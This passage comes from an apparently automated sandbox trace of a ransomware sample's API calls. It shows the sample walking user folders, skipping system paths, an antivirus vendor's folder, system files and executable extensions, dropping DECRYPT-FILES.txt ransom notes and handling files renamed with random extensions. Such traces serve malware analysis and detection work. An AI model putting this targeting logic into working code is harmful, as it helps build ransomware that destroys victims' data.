(lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.554] GetLastError () returned 0x5 [0186.555] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0186.555] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.555] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt") returned 76 [0186.555] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.555] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0186.555] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0186.555] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.555] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.555] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.555] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0d14f80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d14f80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d14f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.555] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.555] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9ba4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg.kC6F9vy", cAlternateFileName="TRANSC~1.KC6")) returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="DECRYPT-FILES.txt") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="autorun.inf") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="boot.ini") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="desktop.ini") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="ntuser.dat") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="iconcache.db") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="bootsect.bak") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="ntuser.dat.log") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="thumbs.db") returned 1 [0186.555] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.kC6F9vy", lpString2="Bootfont.bin") returned 1 [0186.555] lstrlenW (lpString="TranscodedWallpaper.jpg.kC6F9vy") returned 31 [0186.555] lstrcmpiW (lpString1="kC6F9vy", lpString2="lnk") returned -1 [0186.555] lstrcmpiW (lpString1="kC6F9vy", lpString2="exe") returned 1 [0186.555] lstrcmpiW (lpString1="kC6F9vy", lpString2="sys") returned -1 [0186.556] lstrcmpiW (lpString1="kC6F9vy", lpString2="dll") returned 1 [0186.556] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 58 [0186.556] lstrlenW (lpString="TranscodedWallpaper.jpg.kC6F9vy") returned 31 [0186.556] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0186.556] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="TranscodedWallpaper.jpg.kC6F9vy" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.kC6F9vy") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.kC6F9vy" [0186.556] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.556] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.kC6F9vy" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.kc6f9vy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.556] CloseHandle (hObject=0x0) returned 0 [0186.556] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.556] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9ba4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg.kC6F9vy", cAlternateFileName="TRANSC~1.KC6")) returned 0 [0186.556] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.556] CloseHandle (hObject=0xffffffff) returned 0 [0186.556] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes\\", cAlternateFileName="")) returned 0 [0186.557] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.557] CloseHandle (hObject=0xffffffff) returned 0 [0186.557] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0b25da0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b25da0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows\\", cAlternateFileName="")) returned 0 [0186.557] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0186.557] CloseHandle (hObject=0xffffffff) returned 0 [0186.557] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft\\", cAlternateFileName="MICROS~1")) returned 0 [0186.557] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.557] CloseHandle (hObject=0xffffffff) returned 0 [0186.557] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="")) returned 0 [0186.557] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.557] CloseHandle (hObject=0xffffffff) returned 0 [0186.557] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0186.557] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0186.557] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0186.557] lstrcatW (in: lpString1="Application Data", lpString2="\\" | out: lpString1="Application Data\\") returned="Application Data\\" [0186.557] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\Program Files") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch=":\\Windows") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\Games\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\All Users") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.557] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="AhnLab") returned 0x0 [0186.558] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.558] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0186.558] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.558] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Application Data\\\\0a16c9.tmp") returned 45 [0186.558] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\application data\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.558] GetLastError () returned 0x5 [0186.558] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0186.558] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.558] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Application Data\\\\DECRYPT-FILES.txt") returned 52 [0186.558] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\application data\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.558] lstrlenW (lpString="C:\\Users\\Default\\Application Data\\") returned 34 [0186.558] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Application Data\\*") returned="C:\\Users\\Default\\Application Data\\*" [0186.558] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming\\", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.558] CloseHandle (hObject=0xffffffff) returned 0 [0186.558] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0186.558] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0186.558] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0186.558] lstrcatW (in: lpString1="Contacts", lpString2="\\" | out: lpString1="Contacts\\") returned="Contacts\\" [0186.558] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0186.558] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\Program Files") returned 0x0 [0186.558] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch=":\\Windows") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\Games\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\All Users") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="AhnLab") returned 0x0 [0186.559] StrStrW (lpFirst="C:\\Users\\Default\\Contacts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.559] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0186.559] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.559] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Contacts\\\\0a16c9.tmp") returned 37 [0186.559] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\contacts\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.565] GetLastError () returned 0x5 [0186.565] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0186.565] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.565] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Contacts\\\\DECRYPT-FILES.txt") returned 44 [0186.565] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\contacts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.566] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0186.566] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Contacts\\*") returned="C:\\Users\\Default\\Contacts\\*" [0186.566] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.567] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.567] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c26, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact.iSwY", cAlternateFileName="ADMINI~1.ISW")) returned 1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="DECRYPT-FILES.txt") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="autorun.inf") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="boot.ini") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="desktop.ini") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="ntuser.dat") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="iconcache.db") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="bootsect.bak") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="ntuser.dat.log") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="thumbs.db") returned -1 [0186.567] lstrcmpiW (lpString1="Administrator.contact.iSwY", lpString2="Bootfont.bin") returned -1 [0186.568] lstrlenW (lpString="Administrator.contact.iSwY") returned 26 [0186.568] lstrcmpiW (lpString1="iSwY", lpString2="lnk") returned -1 [0186.568] lstrcmpiW (lpString1="iSwY", lpString2="exe") returned 1 [0186.568] lstrcmpiW (lpString1="iSwY", lpString2="sys") returned -1 [0186.568] lstrcmpiW (lpString1="iSwY", lpString2="dll") returned 1 [0186.568] lstrlenW (lpString="C:\\Users\\Default\\Contacts\\") returned 26 [0186.568] lstrlenW (lpString="Administrator.contact.iSwY") returned 26 [0186.568] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0186.568] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="Administrator.contact.iSwY" | out: lpString1="C:\\Users\\Default\\Contacts\\Administrator.contact.iSwY") returned="C:\\Users\\Default\\Contacts\\Administrator.contact.iSwY" [0186.568] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.568] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Administrator.contact.iSwY" (normalized: "c:\\users\\default\\contacts\\administrator.contact.iswy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.568] CloseHandle (hObject=0x0) returned 0 [0186.568] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.568] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d873a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0d873a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d873a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.568] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.568] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.568] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.568] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.568] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.569] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.569] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.569] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.569] CloseHandle (hObject=0xffffffff) returned 0 [0186.569] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0186.569] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0186.569] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0186.569] lstrcatW (in: lpString1="Cookies", lpString2="\\" | out: lpString1="Cookies\\") returned="Cookies\\" [0186.569] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Cookies\\" | out: 